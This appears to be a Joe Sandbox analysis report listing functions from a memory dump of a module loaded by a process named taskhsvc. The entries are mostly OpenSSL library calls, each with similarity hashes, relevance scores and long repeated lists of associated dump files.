                                                            Similarity
                                                            • API ID: F_module_addO_malloc__stack_chk_fail
                                                            • String ID: h
                                                            • API String ID: 1309345834-2439710439
                                                            • Opcode ID: 894e7a205a1a7de3165f3ad8f310b473b5ad66e311880d92529d30e688e561b6
                                                            • Instruction ID: de12215b9f548d93373304b2a02f1c8a49176c5ca1c609085cec76875a26ab3c
                                                            • Opcode Fuzzy Hash: 894e7a205a1a7de3165f3ad8f310b473b5ad66e311880d92529d30e688e561b6
                                                            • Instruction Fuzzy Hash: AE42C1B56087019FE740DF29C28439BBBF1AF85708F21891DE8A89BB44D779D549CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF74F80 Relevance: 77.4, APIs: 42, Strings: 2, Instructions: 354COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BIO_printf.LIBEAY32 ref: 6CF74FAE
                                                              • Part of subcall function 6CECCCD0: BIO_vprintf.LIBEAY32 ref: 6CECCCF5
                                                            • BIO_printf.LIBEAY32 ref: 6CF74FCD
                                                            • i2a_ASN1_OBJECT.LIBEAY32 ref: 6CF74FDD
                                                              • Part of subcall function 6CEF8B00: OBJ_obj2txt.LIBEAY32 ref: 6CEF8B49
                                                              • Part of subcall function 6CEF8B00: BIO_write.LIBEAY32 ref: 6CEF8B70
                                                            • BIO_printf.LIBEAY32 ref: 6CF74FF9
                                                            • i2a_ASN1_STRING.LIBEAY32 ref: 6CF75010
                                                              • Part of subcall function 6CF1B120: BIO_write.LIBEAY32 ref: 6CF1B19C
                                                            • BIO_printf.LIBEAY32 ref: 6CF7502C
                                                            • i2a_ASN1_STRING.LIBEAY32 ref: 6CF75043
                                                            • BIO_printf.LIBEAY32 ref: 6CF7505F
                                                            • i2a_ASN1_INTEGER.LIBEAY32 ref: 6CF7506E
                                                            • BIO_printf.LIBEAY32 ref: 6CF7507E
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF7509B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_printf$i2a_$O_write$J_obj2txtO_vprintf__stack_chk_fail
                                                            • String ID: (UNKNOWN)$good
                                                            • API String ID: 557006997-2226463364
                                                            • Opcode ID: 9a7ca846bb72754ff9e4fb76e666ec8bc4ab4181f9501336e07d02a83d42d809
                                                            • Instruction ID: 2d583297b450915b9093e40a8d802a2eb757f28b72f851fddfd5383a60ac4310
                                                            • Opcode Fuzzy Hash: 9a7ca846bb72754ff9e4fb76e666ec8bc4ab4181f9501336e07d02a83d42d809
                                                            • Instruction Fuzzy Hash: 0CE105B16097009FC710EF29D58165BBBF1AF85358F16C82EE9A99BB10D730E845CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF28D90 Relevance: 77.3, APIs: 33, Strings: 11, Instructions: 340COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • X509_INFO_new.LIBEAY32 ref: 6CF28DF1
                                                              • Part of subcall function 6CF09EE0: CRYPTO_malloc.LIBEAY32 ref: 6CF09F05
                                                            • PEM_read_bio.LIBEAY32 ref: 6CF28E27
                                                              • Part of subcall function 6CF2B2C0: BUF_MEM_new.LIBEAY32 ref: 6CF2B317
                                                              • Part of subcall function 6CF2B2C0: BUF_MEM_new.LIBEAY32 ref: 6CF2B322
                                                              • Part of subcall function 6CF2B2C0: BUF_MEM_new.LIBEAY32 ref: 6CF2B32D
                                                              • Part of subcall function 6CF2B2C0: BIO_gets.LIBEAY32 ref: 6CF2B373
                                                              • Part of subcall function 6CF2B2C0: strlen.MSVCRT ref: 6CF2B3B7
                                                              • Part of subcall function 6CF2B2C0: BUF_MEM_grow.LIBEAY32 ref: 6CF2B3DE
                                                              • Part of subcall function 6CF2B2C0: ERR_put_error.LIBEAY32 ref: 6CF2B40E
                                                              • Part of subcall function 6CF2B2C0: BUF_MEM_free.LIBEAY32 ref: 6CF2B41A
                                                              • Part of subcall function 6CF2B2C0: BUF_MEM_free.LIBEAY32 ref: 6CF2B426
                                                              • Part of subcall function 6CF2B2C0: BUF_MEM_free.LIBEAY32 ref: 6CF2B432
                                                            • PEM_get_EVP_CIPHER_INFO.LIBEAY32 ref: 6CF28ED1
                                                            • PEM_do_header.LIBEAY32 ref: 6CF28F05
                                                            • d2i_PrivateKey.LIBEAY32 ref: 6CF28F3D
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF28F55
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF28F65
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF28F75
                                                            • sk_new_null.LIBEAY32 ref: 6CF29110
                                                            • ERR_put_error.LIBEAY32 ref: 6CF29146
                                                            • sk_num.LIBEAY32 ref: 6CF29178
                                                            • sk_free.LIBEAY32 ref: 6CF2918E
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF291A0
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF291B0
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF291C0
                                                            • ERR_peek_last_error.LIBEAY32 ref: 6CF292C3
                                                            • ERR_clear_error.LIBEAY32 ref: 6CF292D2
                                                            • sk_push.LIBEAY32 ref: 6CF292E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$M_freeM_new$R_put_error$M_do_headerM_get_M_growM_read_bioO_getsO_mallocO_newPrivateR_clear_errorR_peek_last_errorX509_d2i_sk_freesk_new_nullsk_numsk_pushstrlen
                                                            • String ID: A$CERTIFICATE$DSA PRIVATE KEY$EC PRIVATE KEY$RSA PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X509 CRL$k$t$t
                                                            • API String ID: 1294304552-307132529
                                                            • Opcode ID: eae49837a76f3f4f1dc6588b52b93b8cf4141fdc2892f60a12ecfd3d011abcbc
                                                            • Instruction ID: 6adebe1c4ec86a5a7574640b91e818adcbaccc0def60fc19d57635c93d091898
                                                            • Opcode Fuzzy Hash: eae49837a76f3f4f1dc6588b52b93b8cf4141fdc2892f60a12ecfd3d011abcbc
                                                            • Instruction Fuzzy Hash: 49D14D716093058FD700DFA5C48079BBBF4BF84758F12892DE9988BB40EB79D944CB42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEA4F90 Relevance: 63.4, APIs: 34, Strings: 2, Instructions: 359COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_dup
                                                            • String ID:
                                                            • API String ID: 4119201438-0
                                                            • Opcode ID: b8b78ce47ff6a0167a489e88410ab24c010d27e3f4e49601f17e23f2b3f3ba16
                                                            • Instruction ID: 308cc7bf8d6bfcb31dbedb84ded9482b898535fd4641767f9ba89f24b3eac08f
                                                            • Opcode Fuzzy Hash: b8b78ce47ff6a0167a489e88410ab24c010d27e3f4e49601f17e23f2b3f3ba16
                                                            • Instruction Fuzzy Hash: B1E10A75509B009FDB00DF69C58064BBBF5BF89348F52891CE9989B700D774E90ACF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF2E6F0 Relevance: 61.7, APIs: 34, Strings: 1, Instructions: 403COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • d2i_PKCS8_bio.LIBEAY32 ref: 6CF2E72F
                                                              • Part of subcall function 6CF437B0: ASN1_d2i_bio.LIBEAY32(?,?,?,?,?,?,?,?,?,?,6CF2E734), ref: 6CF437DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_d2i_bioS8_biod2i_
                                                            • String ID: y
                                                            • API String ID: 929219446-4225443349
                                                            • Opcode ID: 55842bdd9c77b645be0ba32273e9408dd7bac38e92134fc7e6f9374a158e7910
                                                            • Instruction ID: 63826926c2e7d1440f03384abb511c0a1eaaf1d8177055d453ebabd21b4ed527
                                                            • Opcode Fuzzy Hash: 55842bdd9c77b645be0ba32273e9408dd7bac38e92134fc7e6f9374a158e7910
                                                            • Instruction Fuzzy Hash: D212C0B56087419FD750DF69C64070BBBF0BB89348F128E1DE9A897710E379A909CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE92480 Relevance: 60.3, APIs: 40, Instructions: 341COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: a91c3f20ce6a65645477b5fa8d22509fae93d5d2e29f80b819db4a15507c6626
                                                            • Instruction ID: 17b988083dd37d8af0da7f21e3d86ef672fe01fe0df38782484658f4744ce225
                                                            • Opcode Fuzzy Hash: a91c3f20ce6a65645477b5fa8d22509fae93d5d2e29f80b819db4a15507c6626
                                                            • Instruction Fuzzy Hash: 52E1D975514B008FCB10EF36C584A4ABBF4BB89318F52991DEAA49B705E730E909CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF3E860 Relevance: 58.2, APIs: 32, Strings: 1, Instructions: 471COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID: A
                                                            • API String ID: 4216919130-3554254475
                                                            • Opcode ID: a590a6be7d587904cf48ceebaade7d16b9fea30e8740ce6b126b82ae46c8352a
                                                            • Instruction ID: e61071db8a67b7eb4f097ba7a8c7775db574124a35a195f186486171006042aa
                                                            • Opcode Fuzzy Hash: a590a6be7d587904cf48ceebaade7d16b9fea30e8740ce6b126b82ae46c8352a
                                                            • Instruction Fuzzy Hash: BE0205715087119FDB00DF29C58054BBBF0BF89328F16AA2DEA989B740D334E945CBD6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF42FB0 Relevance: 55.8, APIs: 37, Instructions: 328COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RSAPublicKey_it.LIBEAY32 ref: 6CF42FC8
                                                            • ASN1_item_i2d_bio.LIBEAY32 ref: 6CF42FD8
                                                              • Part of subcall function 6CEFE120: ASN1_item_i2d.LIBEAY32 ref: 6CEFE154
                                                              • Part of subcall function 6CEFE120: BIO_write.LIBEAY32 ref: 6CEFE189
                                                              • Part of subcall function 6CEFE120: CRYPTO_free.LIBEAY32 ref: 6CEFE19E
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF42FEF
                                                            • ASN1_i2d_bio.LIBEAY32 ref: 6CF43025
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
